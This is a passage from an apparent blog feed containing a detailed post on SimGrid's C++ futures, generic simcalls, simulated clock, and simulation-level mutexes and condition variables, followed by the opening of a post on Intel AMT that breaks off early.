This is an overview of some recent additions to the SimGrid code\nrelated to actor synchronisation. It might be interesting for people\nusing SimGrid, working on SimGrid or for people interested in generic\nC++ code for synchronisation or asynchronicity.

\n

SimGrid as a Discrete Event Simulator

\n

SimGrid is a discrete event simulator of\ndistributed systems: it does not simulate the world by small fixed-size steps\nbut determines the date of the next event (such as the end of a communication,\nthe end of a computation) and jumps to this date.

\n

A number of actors executing user-provided code run on top of the\nsimulation kernel1. When an actor needs to interact with the simulation\nkernel (eg. to start a communication), it issues a simcall\n(simulation call, an analogy to system calls) to the simulation kernel.\nThis freezes the actor until it is woken up by the simulation kernel\n(eg. when the communication is finished).

\n

The key ideas here are:

\n\n

Futures

\n

What is a future?

\n

We need a generic way to represent asynchronous operations in the\nsimulation kernel. Futures\nare a nice abstraction for this which have been added to a lot of languages\n(Java, Python, C++ since C++11, ECMAScript, etc.)9.

\n

A future represents the result of an asynchronous operation. As the operation\nmay not be completed yet, its result is not available yet. Two different sorts\nof APIs may be available to expose this future result:

\n\n

C++11 includes a generic class (std::future<T>) which implements a blocking API.\nThe continuation-based API\nis not available in the standard (yet) but is described in the\nConcurrency Technical\nSpecification.

\n

Which future do we need?

\n

We might want to use a solution based on std::future but our need is slightly\ndifferent from the C++11 futures. C++11 futures are not suitable for use inside\nthe simulation kernel because they only provide a blocking API\n(future.get()) whereas the simulation kernel cannot block.\nInstead, we need a continuation-based API to be used in our event-driven\nsimulation kernel.
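The difference between the two styles can be sketched in a few lines of Python (a toy model for illustration, not SimGrid's C++ API): instead of blocking in get(), the consumer registers a continuation that the kernel fires when it resolves the future.

```python
# Toy continuation-based future (Python sketch, not SimGrid's C++ API):
# the consumer never blocks; it registers a continuation which the
# event loop runs when the operation completes.
class Future:
    def __init__(self):
        self._ready = False
        self._value = None
        self._continuation = None

    def then(self, continuation):
        if self._ready:
            continuation(self._value)  # already resolved: run now
        else:
            self._continuation = continuation

    def set_value(self, value):
        self._value = value
        self._ready = True
        if self._continuation is not None:
            self._continuation(value)

results = []
f = Future()
f.then(results.append)  # no blocking get(): register a continuation
f.set_value(42)         # the "simulation kernel" resolves the future
print(results)  # [42]
```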

\n

The C++ Concurrency TS describes a continuation-based API.\nOur futures are based on this with a few differences5:

\n\n

Implementing Future

\n

The implementation of future is in simgrid::kernel::Future and\nsimgrid::kernel::Promise6 and is based on the Concurrency\nTS3:

\n

The future and the associated promise use a shared state defined with:

\n
enum class FutureStatus {\n  not_ready,\n  ready,\n  done,\n};\n\nclass FutureStateBase : private boost::noncopyable {\npublic:\n  void schedule(simgrid::xbt::Task<void()>&& job);\n  void set_exception(std::exception_ptr exception);\n  void set_continuation(simgrid::xbt::Task<void()>&& continuation);\n  FutureStatus get_status() const;\n  bool is_ready() const;\n  // [...]\nprivate:\n  FutureStatus status_ = FutureStatus::not_ready;\n  std::exception_ptr exception_;\n  simgrid::xbt::Task<void()> continuation_;\n};\n\ntemplate<class T>\nclass FutureState : public FutureStateBase {\npublic:\n  void set_value(T value);\n  T get();\nprivate:\n  boost::optional<T> value_;\n};\n\ntemplate<class T>\nclass FutureState<T&> : public FutureStateBase {\n  // ...\n};\ntemplate<>\nclass FutureState<void> : public FutureStateBase {\n  // ...\n};\n
\n\n\n

Both Future and Promise have a reference to the shared state:

\n
template<class T>\nclass Future {\n  // [...]\nprivate:\n  std::shared_ptr<FutureState<T>> state_;\n};\n\ntemplate<class T>\nclass Promise {\n  // [...]\nprivate:\n  std::shared_ptr<FutureState<T>> state_;\n  bool future_get_ = false;\n};\n
\n\n\n

The crux of future.then() is:

\n
template<class T>\ntemplate<class F>\nauto simgrid::kernel::Future<T>::thenNoUnwrap(F continuation)\n-> Future<decltype(continuation(std::move(*this)))>\n{\n  typedef decltype(continuation(std::move(*this))) R;\n\n  if (state_ == nullptr)\n    throw std::future_error(std::future_errc::no_state);\n\n  auto state = std::move(state_);\n  // Create a new future...\n  Promise<R> promise;\n  Future<R> future = promise.get_future();\n  // ...and when the current future is ready...\n  state->set_continuation(simgrid::xbt::makeTask(\n    [](Promise<R> promise, std::shared_ptr<FutureState<T>> state,\n         F continuation) {\n      // ...set the new future value by running the continuation.\n      Future<T> future(std::move(state));\n      simgrid::xbt::fulfillPromise(promise,[&]{\n        return continuation(std::move(future));\n      });\n    },\n    std::move(promise), state, std::move(continuation)));\n  return std::move(future);\n}\n
\n\n\n

We added a (much simpler) future.then_() method which does not\ncreate a new future:

\n
template<class T>\ntemplate<class F>\nvoid simgrid::kernel::Future<T>::then_(F continuation)\n{\n  if (state_ == nullptr)\n    throw std::future_error(std::future_errc::no_state);\n  // Give shared-ownership to the continuation:\n  auto state = std::move(state_);\n  state->set_continuation(simgrid::xbt::makeTask(\n    std::move(continuation), state));\n}\n
\n\n\n

The .get() delegates to the shared state. As we mentioned previously, an\nerror is raised if the future is not ready:

\n
template<class T>\nT simgrid::kernel::Future<T>::get()\n{\n  if (state_ == nullptr)\n    throw std::future_error(std::future_errc::no_state);\n  std::shared_ptr<FutureState<T>> state = std::move(state_);\n  return state->get();\n}\n\ntemplate<class T>\nT simgrid::kernel::FutureState<T>::get()\n{\n  if (status_ != FutureStatus::ready)\n    xbt_die(\"Deadlock: this future is not ready\");\n  status_ = FutureStatus::done;\n  if (exception_) {\n    std::exception_ptr exception = std::move(exception_);\n    exception_ = nullptr;\n    std::rethrow_exception(std::move(exception));\n  }\n  xbt_assert(this->value_);\n  auto result = std::move(this->value_.get());\n  this->value_ = boost::optional<T>();\n  return std::move(result);\n}\n
\n\n\n

Generic simcalls

\n

Motivation

\n

Simcalls are not so easy to understand and adding a new one is not so easy\neither. In order to add one simcall, one has to first\nadd it to the list of simcalls\nwhich looks like this:

\n
# This looks like C++ but it is a basic IDL-like language\n# (one definition per line) parsed by a python script:\n\nvoid process_kill(smx_process_t process);\nvoid process_killall(int reset_pid);\nvoid process_cleanup(smx_process_t process) [[nohandler]];\nvoid process_suspend(smx_process_t process) [[block]];\nvoid process_resume(smx_process_t process);\nvoid process_set_host(smx_process_t process, sg_host_t dest);\nint  process_is_suspended(smx_process_t process) [[nohandler]];\nint  process_join(smx_process_t process, double timeout) [[block]];\nint  process_sleep(double duration) [[block]];\n\nsmx_mutex_t mutex_init();\nvoid        mutex_lock(smx_mutex_t mutex) [[block]];\nint         mutex_trylock(smx_mutex_t mutex);\nvoid        mutex_unlock(smx_mutex_t mutex);\n\n[...]\n
\n\n\n

At runtime, a simcall is represented by a structure containing a simcall\nnumber and its arguments (among some other things):

\n
struct s_smx_simcall {\n  // Simcall number:\n  e_smx_simcall_t call;\n  // Issuing actor:\n  smx_process_t issuer;\n  // Arguments of the simcall:\n  union u_smx_scalar args[11];\n  // Result of the simcall:\n  union u_smx_scalar result;\n  // Some additional stuff:\n  smx_timer_t timer;\n  int mc_value;\n};\n
\n\n\n

with a scalar union type:

\n
union u_smx_scalar {\n  char            c;\n  short           s;\n  int             i;\n  long            l;\n  long long       ll;\n  unsigned char   uc;\n  unsigned short  us;\n  unsigned int    ui;\n  unsigned long   ul;\n  unsigned long long ull;\n  double          d;\n  void*           dp;\n  FPtr            fp;\n};\n
\n\n\n

Then one has to call (manually\"\ud83d\ude22\") a\nPython script\nwhich generates a bunch of C++ files:

\n\n

Then one has to write the code of the kernel side handler for the simcall\nand the code of the simcall itself (which calls the code-generated\nmarshaling/unmarshaling stuff)\"\ud83d\ude2d\".

\n

In order to simplify this process, we added two generic simcalls which\ncan be used to execute a function in the simulation kernel context:

\n
# This one should really be called run_immediate:\nvoid run_kernel(std::function<void()> const* code) [[nohandler]];\nvoid run_blocking(std::function<void()> const* code) [[block,nohandler]];\n
\n\n\n

Immediate simcall

\n

The first one (simcall_run_kernel()) executes a function in the simulation\nkernel context and returns immediately (without blocking the actor):

\n
void simcall_run_kernel(std::function<void()> const& code)\n{\n  simcall_BODY_run_kernel(&code);\n}\n\ntemplate<class F> inline\nvoid simcall_run_kernel(F& f)\n{\n  simcall_run_kernel(std::function<void()>(std::ref(f)));\n}\n
\n\n\n

On top of this, we add a wrapper which can be used to return a value of any\ntype and properly handles exceptions:

\n
template<class F>\ntypename std::result_of<F()>::type kernelImmediate(F&& code)\n{\n  // If we are in the simulation kernel, we take the fast path and\n  // execute the code directly without simcall\n  // marshalling/unmarshalling/dispatch:\n  if (SIMIX_is_maestro())\n    return std::forward<F>(code)();\n\n  // If we are in the application, pass the code to the simulation\n  // kernel which executes it for us and reports the result:\n  typedef typename std::result_of<F()>::type R;\n  simgrid::xbt::Result<R> result;\n  simcall_run_kernel([&]{\n    xbt_assert(SIMIX_is_maestro(), \"Not in maestro\");\n    simgrid::xbt::fulfillPromise(result, std::forward<F>(code));\n  });\n  return result.get();\n}\n
\n\n\n

where Result<R> can store either a R or an exception.

\n

Example of usage:

\n
xbt_dict_t Host::properties() {\n  return simgrid::simix::kernelImmediate([&] {\n    simgrid::surf::HostImpl* surf_host =\n      this->extension<simgrid::surf::HostImpl>();\n    return surf_host->getProperties();\n  });\n}\n
\n\n\n

In this example, the kernelImmediate() call is not in user code but\nin the framework code. We do not expect the normal user to write\nsimulator kernel code. Those mechanisms are intended to be used by\nthe implementer of the framework in order to implement user\nprimitives.

\n

Blocking simcall

\n

The second generic simcall (simcall_run_blocking()) executes a function in\nthe SimGrid simulation kernel immediately but does not wake up the calling actor\nimmediately:

\n
void simcall_run_blocking(std::function<void()> const& code);\n\ntemplate<class F>\nvoid simcall_run_blocking(F& f)\n{\n  simcall_run_blocking(std::function<void()>(std::ref(f)));\n}\n
\n\n\n

The f function is expected to setup some callbacks in the simulation\nkernel which will wake up the actor (with\nsimgrid::simix::unblock(actor)) when the operation is completed.

\n

This is wrapped in a higher-level primitive as well. The\nkernelSync() function expects a function-object which is executed\nimmediately in the simulation kernel and returns a Future<T>. The\nsimulator blocks the actor and resumes it when the Future<T> becomes\nready with its result:

\n
template<class F>\nauto kernelSync(F code) -> decltype(code().get())\n{\n  typedef decltype(code().get()) T;\n  if (SIMIX_is_maestro())\n    xbt_die(\"Can't execute blocking call in kernel mode\");\n\n  smx_process_t self = SIMIX_process_self();\n  simgrid::xbt::Result<T> result;\n\n  simcall_run_blocking([&result, self, &code]{\n    try {\n      auto future = code();\n      future.then_([&result, self](simgrid::kernel::Future<T> value) {\n        // Propagate the result from the future\n        // to the simgrid::xbt::Result:\n        simgrid::xbt::setPromise(result, value);\n        simgrid::simix::unblock(self);\n      });\n    }\n    catch (...) {\n      // The code failed immediately. We can wake up the actor\n      // immediately with the exception:\n      result.set_exception(std::current_exception());\n      simgrid::simix::unblock(self);\n    }\n  });\n\n  // Get the result of the operation (which might be an exception):\n  return result.get();\n}\n
\n\n\n

A contrived example of this would be:

\n
int res = simgrid::simix::kernelSync([&] {\n  return kernel_wait_until(30).then(\n    [](simgrid::kernel::Future<void> future) {\n      return 42;\n    }\n  );\n});\n
\n\n\n

A more realistic example (implementing user-level primitives) would\nbe:

\n
sg_size_t File::read(sg_size_t size)\n{\n  return simgrid::simix::kernelSync([&] {\n    return file_->async_read(size);\n  });\n}\n
\n\n\n

Asynchronous operations

\n

We can write the related kernelAsync() which wakes up the actor immediately\nand returns a future to the actor. As this future is used in the actor context,\nit is a different future\n(simgrid::simix::Future instead of simgrid::kernel::Future)\nwhich implements a C++11 std::future wait-based API:

\n
template <class T>\nclass Future {\npublic:\n  Future() {}\n  Future(simgrid::kernel::Future<T> future) : future_(std::move(future)) {}\n  bool valid() const { return future_.valid(); }\n  T get();\n  bool is_ready() const;\n  void wait();\nprivate:\n  // We wrap an event-based kernel future:\n  simgrid::kernel::Future<T> future_;\n};\n
\n\n\n

The future.get() method is implemented as4:

\n
template<class T>\nT simgrid::simix::Future<T>::get()\n{\n  if (!valid())\n    throw std::future_error(std::future_errc::no_state);\n  smx_process_t self = SIMIX_process_self();\n  simgrid::xbt::Result<T> result;\n  simcall_run_blocking([this, &result, self]{\n    try {\n      // When the kernel future is ready...\n      this->future_.then_(\n        [this, &result, self](simgrid::kernel::Future<T> value) {\n          // ... wake up the process with the result of the kernel future.\n          simgrid::xbt::setPromise(result, value);\n          simgrid::simix::unblock(self);\n      });\n    }\n    catch (...) {\n      result.set_exception(std::current_exception());\n      simgrid::simix::unblock(self);\n    }\n  });\n  return result.get();\n}\n
\n\n\n

kernelAsync() simply \"\ud83d\ude09\" calls kernelImmediate() and wraps the\nsimgrid::kernel::Future into a simgrid::simix::Future:

\n
template<class F>\nauto kernelAsync(F code)\n  -> Future<decltype(code().get())>\n{\n  typedef decltype(code().get()) T;\n\n  // Execute the code in the simulation kernel and get the kernel future:\n  simgrid::kernel::Future<T> future =\n    simgrid::simix::kernelImmediate(std::move(code));\n\n  // Wrap the kernel future in a user future:\n  return simgrid::simix::Future<T>(std::move(future));\n}\n
\n\n\n

A contrived example of this would be:

\n
simgrid::simix::Future<int> future = simgrid::simix::kernelAsync([&] {\n  return kernel_wait_until(30).then(\n    [](simgrid::kernel::Future<void> future) {\n      return 42;\n    }\n  );\n});\ndo_some_stuff();\nint res = future.get();\n
\n\n\n

A more realistic example (implementing user-level primitives) would\nbe:

\n
simgrid::simix::Future<sg_size_t> File::async_read(sg_size_t size)\n{\n  return simgrid::simix::kernelAsync([&] {\n    return file_->async_read(size);\n  });\n}\n
\n\n\n

kernelSync() could be rewritten as:

\n
template<class F>\nauto kernelSync(F code) -> decltype(code().get())\n{\n  return kernelAsync(std::move(code)).get();\n}\n
\n\n\n

The semantics are equivalent, but this form would require two simcalls\ninstead of one to do the same job (one in kernelAsync() and one in\n.get()).

\n

Representing the simulated time

\n

SimGrid uses double for representing the simulated time:

\n\n

In contrast, all the C++ APIs use std::chrono::duration and\nstd::chrono::time_point. They are used in:

\n\n

We can define future.wait_for(duration) and future.wait_until(timepoint)\nfor our futures but for better compatibility with standard C++ code, we might\nwant to define versions expecting std::chrono::duration and\nstd::chrono::time_point.

\n

For time points, we need to define a clock working in the simulated time\n(which meets the\nTrivialClock\nrequirements, see\n[time.clock.req]\nin the C++14 standard):

\n
struct SimulationClock {\n  using rep        = double;\n  using period     = std::ratio<1>;\n  using duration   = std::chrono::duration<rep, period>;\n  using time_point = std::chrono::time_point<SimulationClock, duration>;\n  static constexpr bool is_steady = true;\n  static time_point now()\n  {\n    return time_point(duration(SIMIX_get_clock()));\n  }\n};\n
\n\n\n

A time point in the simulation is a time point using this clock:

\n
template<class Duration>\nusing SimulationTimePoint =\n  std::chrono::time_point<SimulationClock, Duration>;\n
\n\n\n

This is used for example in simgrid::s4u::this_actor::sleep_for() and\nsimgrid::s4u::this_actor::sleep_until():

\n
void sleep_for(double duration)\n{\n  if (duration > 0)\n    simcall_process_sleep(duration);\n}\n\nvoid sleep_until(double timeout)\n{\n  double now = SIMIX_get_clock();\n  if (timeout > now)\n    simcall_process_sleep(timeout - now);\n}\n\ntemplate<class Rep, class Period>\nvoid sleep_for(std::chrono::duration<Rep, Period> duration)\n{\n  auto seconds =\n    std::chrono::duration_cast<SimulationClockDuration>(duration);\n  this_actor::sleep_for(seconds.count());\n}\n\ntemplate<class Duration>\nvoid sleep_until(const SimulationTimePoint<Duration>& timeout_time)\n{\n  auto timeout_native =\n    std::chrono::time_point_cast<SimulationClockDuration>(timeout_time);\n  this_actor::sleep_until(timeout_native.time_since_epoch().count());\n}\n
\n\n\n

Which means it is possible to use (since C++14):

\n
using namespace std::chrono_literals;\nsimgrid::s4u::this_actor::sleep_for(42s);\n
\n\n\n

Mutexes and condition variables

\n

Mutexes

\n

SimGrid has had a C-based API for mutexes and condition variables for\nsome time. These mutexes are different from the standard\nsystem-level mutex (std::mutex, pthread_mutex_t, etc.) because\nthey work at simulation-level. Locking on a simulation mutex does\nnot block the thread directly but makes a simcall\n(simcall_mutex_lock()) which asks the simulation kernel to wake the calling\nactor when it can get ownership of the mutex. Blocking directly at the\nOS level would deadlock the simulation.

\n

Reusing the C++ standard API for our simulation mutexes has many\nbenefits:

\n\n

We defined a reference-counted Mutex class for this (which supports\nthe Lockable\nrequirements, see\n[thread.req.lockable.req]\nin the C++14 standard):

\n
class Mutex {\n  friend ConditionVariable;\nprivate:\n  friend simgrid::simix::Mutex;\n  simgrid::simix::Mutex* mutex_;\n  Mutex(simgrid::simix::Mutex* mutex) : mutex_(mutex) {}\npublic:\n\n  friend void intrusive_ptr_add_ref(Mutex* mutex);\n  friend void intrusive_ptr_release(Mutex* mutex);\n  using Ptr = boost::intrusive_ptr<Mutex>;\n\n  // No copy:\n  Mutex(Mutex const&) = delete;\n  Mutex& operator=(Mutex const&) = delete;\n\n  static Ptr createMutex();\n\npublic:\n  void lock();\n  void unlock();\n  bool try_lock();\n};\n
\n\n\n

The methods are simply wrappers around existing simcalls:

\n
void Mutex::lock()\n{\n  simcall_mutex_lock(mutex_);\n}\n
\n\n\n

Using the same API as std::mutex (Lockable) means we can use existing\nC++-standard code such as std::unique_lock<Mutex> or\nstd::lock_guard<Mutex> for exception-safe mutex handling8:

\n
{\n  std::lock_guard<simgrid::s4u::Mutex> lock(*mutex);\n  sum += 1;\n}\n
\n\n\n

Condition Variables

\n

Similarly, SimGrid already had simulation-level condition variables\nwhich can be exposed using the same API as std::condition_variable:

\n
class ConditionVariable {\nprivate:\n  friend s_smx_cond;\n  smx_cond_t cond_;\n  ConditionVariable(smx_cond_t cond) : cond_(cond) {}\npublic:\n\n  ConditionVariable(ConditionVariable const&) = delete;\n  ConditionVariable& operator=(ConditionVariable const&) = delete;\n\n  friend void intrusive_ptr_add_ref(ConditionVariable* cond);\n  friend void intrusive_ptr_release(ConditionVariable* cond);\n  using Ptr = boost::intrusive_ptr<ConditionVariable>;\n  static Ptr createConditionVariable();\n\n  void wait(std::unique_lock<Mutex>& lock);\n  template<class P>\n  void wait(std::unique_lock<Mutex>& lock, P pred);\n\n  // Wait functions taking a plain double as time:\n\n  std::cv_status wait_until(std::unique_lock<Mutex>& lock,\n    double timeout_time);\n  std::cv_status wait_for(\n    std::unique_lock<Mutex>& lock, double duration);\n  template<class P>\n  bool wait_until(std::unique_lock<Mutex>& lock,\n    double timeout_time, P pred);\n  template<class P>\n  bool wait_for(std::unique_lock<Mutex>& lock,\n    double duration, P pred);\n\n  // Wait functions taking a std::chrono time:\n\n  template<class Rep, class Period, class P>\n  bool wait_for(std::unique_lock<Mutex>& lock,\n    std::chrono::duration<Rep, Period> duration, P pred);\n  template<class Rep, class Period>\n  std::cv_status wait_for(std::unique_lock<Mutex>& lock,\n    std::chrono::duration<Rep, Period> duration);\n  template<class Duration>\n  std::cv_status wait_until(std::unique_lock<Mutex>& lock,\n    const SimulationTimePoint<Duration>& timeout_time);\n  template<class Duration, class P>\n  bool wait_until(std::unique_lock<Mutex>& lock,\n    const SimulationTimePoint<Duration>& timeout_time, P pred);\n\n  // Notify:\n\n  void notify_one();\n  void notify_all();\n\n};\n
\n\n\n

We currently accept both double (for simplicity and consistency with\nthe current codebase) and std::chrono types (for compatibility with\nC++ code) as durations and timepoints. One important thing to notice here is\nthat cond.wait_for() and cond.wait_until() work in the simulated time,\nnot in the real time.

\n

The simple cond.wait() and cond.wait_for() delegate to\npre-existing simcalls:

\n
void ConditionVariable::wait(std::unique_lock<Mutex>& lock)\n{\n  simcall_cond_wait(cond_, lock.mutex()->mutex_);\n}\n\nstd::cv_status ConditionVariable::wait_for(\n  std::unique_lock<Mutex>& lock, double timeout)\n{\n  // The simcall uses -1 for \"any timeout\" but we don't want this:\n  if (timeout < 0)\n    timeout = 0.0;\n\n  try {\n    simcall_cond_wait_timeout(cond_, lock.mutex()->mutex_, timeout);\n    return std::cv_status::no_timeout;\n  }\n  catch (xbt_ex& e) {\n\n    // If the exception was a timeout, we have to take the lock again:\n    if (e.category == timeout_error) {\n      try {\n        lock.mutex()->lock();\n        return std::cv_status::timeout;\n      }\n      catch (...) {\n        std::terminate();\n      }\n    }\n\n    std::terminate();\n  }\n  catch (...) {\n    std::terminate();\n  }\n}\n
\n\n\n

Other methods are simple wrappers around those two:

\n
template<class P>\nvoid ConditionVariable::wait(std::unique_lock<Mutex>& lock, P pred)\n{\n  while (!pred())\n    wait(lock);\n}\n\ntemplate<class P>\nbool ConditionVariable::wait_until(std::unique_lock<Mutex>& lock,\n  double timeout_time, P pred)\n{\n  while (!pred())\n    if (this->wait_until(lock, timeout_time) == std::cv_status::timeout)\n      return pred();\n  return true;\n}\n\ntemplate<class P>\nbool ConditionVariable::wait_for(std::unique_lock<Mutex>& lock,\n  double duration, P pred)\n{\n  return this->wait_until(lock,\n    SIMIX_get_clock() + duration, std::move(pred));\n}\n
\n\n\n

Conclusion

\n

We wrote two future implementations based on the std::future API:

\n\n

These futures are used to implement kernelSync() and kernelAsync() which\nexpose asynchronous operations in the simulation kernel to the actors.

\n

In addition, we wrote variations of some other C++ standard library\nclasses (SimulationClock, Mutex, ConditionVariable) which work in\nthe simulation:

\n\n

Reusing the same API as the C++ standard library is very useful because:

\n\n

This type of approach might be useful for other libraries which define\ntheir own contexts. An example of this is\nMordor, a I/O library using fibers\n(cooperative scheduling): it implements cooperative/fiber\nmutex,\nrecursive\nmutex\nwhich are compatible with the\nBasicLockable\nrequirements (see\n[thread.req.lockable.basic]\nin the C++14 standard).

\n

Appendix: useful helpers

\n

Result

\n

Result is like a mix of std::future and std::promise in a\nsingle object, without shared state and synchronisation:

\n
template<class T>\nclass Result {\n  enum class ResultStatus {\n    invalid,\n    value,\n    exception,\n  };\npublic:\n  Result();\n  ~Result();\n  Result(Result const& that);\n  Result& operator=(Result const& that);\n  Result(Result&& that);\n  Result& operator=(Result&& that);\n  bool is_valid() const;\n  void reset();\n  void set_exception(std::exception_ptr e);\n  void set_value(T&& value);\n  void set_value(T const& value);\n  T get();\nprivate:\n  ResultStatus status_ = ResultStatus::invalid;\n  union {\n    T value_;\n    std::exception_ptr exception_;\n  };\n};\n
\n\n\n

Promise helpers

\n

These helpers are useful for dealing with generic future-based code:

\n
template<class R, class F>\nauto fulfillPromise(R& promise, F&& code)\n-> decltype(promise.set_value(code()))\n{\n  try {\n    promise.set_value(std::forward<F>(code)());\n  }\n  catch(...) {\n    promise.set_exception(std::current_exception());\n  }\n}\n\ntemplate<class P, class F>\nauto fulfillPromise(P& promise, F&& code)\n-> decltype(promise.set_value())\n{\n  try {\n    std::forward<F>(code)();\n    promise.set_value();\n  }\n  catch(...) {\n    promise.set_exception(std::current_exception());\n  }\n}\n\ntemplate<class P, class F>\nvoid setPromise(P& promise, F&& future)\n{\n  fulfillPromise(promise, [&]{ return std::forward<F>(future).get(); });\n}\n
\n\n\n

Task

\n

Task<R(F...)> is a type-erased callable object similar to\nstd::function<R(F...)> but works for move-only types. It is similar to\nstd::packaged_task<R(F...)> but does not wrap the result in a std::future<R>\n(it is not packaged).

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
std::functionstd::packaged_tasksimgrid::xbt::Task
CopyableYesNoNo
MovableYesYesYes
Callconstnon-constnon-const
Callablemultiple timesonceonce
Sets a promiseNoYesNo
\n

It could be implemented as:

\n
template<class T>\nclass Task {\nprivate:\n  std::packaged_task<T> task_;\npublic:\n\n  template<class F>\n  Task(F f) :\n    task_(std::forward<F>(f))\n  {}\n\n  template<class... ArgTypes>\n  auto operator()(ArgTypes... args)\n  -> decltype(task_.get_future().get())\n  {\n    task_(std::forward<ArgTypes>(args)...);\n    return task_.get_future().get();\n  }\n\n};\n
\n\n\n

but we don't need a shared-state.

\n

This is useful in order to bind move-only type arguments:

\n
template<class F, class... Args>\nclass TaskImpl {\nprivate:\n  F code_;\n  std::tuple<Args...> args_;\n  typedef decltype(simgrid::xbt::apply(\n    std::move(code_), std::move(args_))) result_type;\npublic:\n  TaskImpl(F code, std::tuple<Args...> args) :\n    code_(std::move(code)),\n    args_(std::move(args))\n  {}\n  result_type operator()()\n  {\n    // simgrid::xbt::apply is C++17 std::apply:\n    return simgrid::xbt::apply(std::move(code_), std::move(args_));\n  }\n};\n\ntemplate<class F, class... Args>\nauto makeTask(F code, Args... args)\n-> Task< decltype(code(std::move(args)...))() >\n{\n  TaskImpl<F, Args...> task(\n    std::move(code), std::make_tuple(std::move(args)...));\n  return std::move(task);\n}\n
\n\n\n

Update (2018-08-15): there is a\nproposal\nfor including this as std::unique_function in the C++ standard.\nIn addition to the implementations listed in the paper, there is also\nfolly::Function\nor stdlab::task.\nThere is a later proposal\nfor extending std::function\nwith non-copyable move-only types and one-shot call\nwith e.g. std::function<void()&&>.

\n
\n
\n
    \n
  1. \n

The relationship between the SimGrid simulation kernel and the simulated\nactors is similar to the relationship between an OS kernel and the OS\nprocesses: the simulation kernel manages (schedules) the execution of the\nactors; the actors make requests to the simulation kernel using simcalls.\nHowever, both the simulation kernel and the actors currently run in the same\nOS process (and use the same address space).\u00a0\u21a9

    \n
  2. \n
  3. \n

    This is the kind of futures that are available in ECMAScript which use\nthe same kind of never-blocking asynchronous model as our discrete event\nsimulator.\u00a0\u21a9

    \n
  4. \n
  5. \n

Currently, we have not implemented some features such as shared\nfutures.\u00a0\u21a9

    \n
  6. \n
  7. \n

    You might want to compare this method with simgrid::kernel::Future::get()\nwe showed previously: the method of the kernel future does not block and\nraises an error if the future is not ready; the method of the actor future\nblocks after having set a continuation to wake the actor when the future\nis ready.\u00a0\u21a9

    \n
  8. \n
  9. \n

    (which are related to the fact that we are in a non-blocking single-threaded\nsimulation engine)\u00a0\u21a9

    \n
  10. \n
  11. \n

In the C++ standard library, std::future<T> is used by the consumer\nof the result. On the other hand, std::promise<T> is used by the\nproducer of the result. The producer calls promise.set_value(42)\nor promise.set_exception(e) in order to set the result which will\nbe made available to the consumer by future.get().\u00a0\u21a9

    \n
  12. \n
  13. \n

    Calling the continuations from simulation loop means that we don't have\nto fear problems like invariants not being restored when the callbacks\nare called \"\ud83d\ude28\" or stack overflows triggered by deeply nested\ncontinuations chains \"\ud83d\ude30\". The continuations are all called in a\nnice and predictable place in the simulator with a nice and predictable\nstate \"\ud83d\ude0c\".\u00a0\u21a9

    \n
  14. \n
  15. \n

std::lock() might kinda work too but it may not be such a good idea to\nuse it as it may use a deadlock avoidance algorithm such as\ntry-and-back-off.\nA backoff would probably uselessly wait in real time instead of simulated\ntime. The deadlock avoidance algorithm might also add non-determinism\nin the simulation which we would like to avoid.\nstd::try_lock() should be safe to use though.\u00a0\u21a9

    \n
  16. \n
  17. \n

    There's an interesting library implementation in\nRust as well.\u00a0\u21a9

    \n
  18. \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2016/07/11/intel-amt-discovery/", "title": "Intel AMT discovery", "url": "https://www.gabriel.urdhr.fr/2016/07/11/intel-amt-discovery/", "date_published": "2016-07-11T00:00:00+02:00", "date_modified": "2017-05-15T00:00:00+02:00", "tags": ["computer", "network", "amt", "python", "security"], "content_html": "

There have been some articles lately about Intel AMT and its impact on\nsecurity,\ntrust,\nprivacy\nand free-software.\nAMT is supposed to be widely deployed in the newest Intel hardware.\nSo I wanted to see if I could find some AMT devices in the wild.

\n

Update: 2017-05-15 Add references related to CVE-2017-5689 (AMT\nvulnerability).

\n

What's AMT anyway?

\n

AMT is an Intel technology for\nout-of-band management\n(without the cooperation of the OS)\nof a computer over the network, even if the computer is turned off.\nIt can be used to do things such as:

\n\n

It implements the DASH\nstandard and is similar to IPMI in terms of features.\nIt uses SOAP over HTTP\nwith some WS-* greatness\nand comes with bells and whistles such as\nintegration with Active Directory.

\n

When AMT is enabled, IP packets incoming on the builtin network adapter for some\nTCP and UDP ports are sent directly to the\nME\ninstead of reaching the OS.\nThe ME has its own processor and its own OS and can give access to the hardware\nover the network. Usually, the ME and the main system share the same network\ninterface, MAC address and IPv6 address.

\n

Relevant citation for DASH:

\n
\n

A physical system\u2019s out-of-band Management Access Point and the In-Band host\nshall share the MAC address and IPv4 address of the network interface.\nManageability traffic shall be routed to the MAP \nthrough the well known system ports defined by IANA.

\n
\n

Relevant citation for AMT:

\n
\n

TCP/UDP messages addressed to certain registered ports are routed to Intel\nAMT when those ports are enabled. Messages received on a wired LAN interface\ngo directly to Intel AMT. Messages received on a wireless interface go to the\nhost wireless driver. The driver detects the destination port and sends the\nmessage to Intel AMT.

\n
\n

My machine

\n

My work laptop has a MEI device and the system loads the MEI Linux\nmodule:

\n
\n$ lspci\n[...]\n00:16.0 Communication controller: Intel Corporation 7 Series/C210 Series Chipset Family MEI Controller #1 (rev 04)\n[...]\n\n$ lsmod | grep mei\nmei_me                 32768  0\nmei                    94208  1 mei_me\n\n$ ls -l /dev/mei*\ncrw------- 1 root root 246, 0 juil.  7 08:53 /dev/mei0\n\n$ grep mei /lib/modules/4.6.0-1-amd64/modules.alias\nalias pci:v00008086d00005A9Asv*sd*bc*sc*i* mei_me\nalias pci:v00008086d00001A9Asv*sd*bc*sc*i* mei_me\n[...]\nalias mei:pn544:0bb17a78-2a8e-4c50-94d4-50266723775c:*:* pn544_me\n\n$ cat /sys/bus/pci/drivers/mei_me/0000:00:16.0/uevent\nMAJOR=248\nMINOR=0\nDEVNAME=mei0\n
\n\n

MEI\nis a PCI-based interface to the ME from within the computer.

\n

However, there is no option to disable AMT in the BIOS on my laptop.\nApparently,\nAMT is not enabled\non this device even if this is not\nabsolutely clear.\nThe hardware seems to be there though.

\n

AMT Discovery

\n

We can use the discovery mechanism of\nAMT\nin order to detect AMT devices on a network.\nThe AMT (and DASH) discovery uses\ntwo phases:

\n
    \n
  1. \n

    the first phase uses ASF RMCP;

    \n
  2. \n
  3. \n

    the second phase uses the WS-Management Identify method.

    \n
  4. \n
\n

The second phase is not so useful so I'll focus on the first one.

\n

Implementation

\n

The first phase is quite simple:

\n
    \n
  1. \n

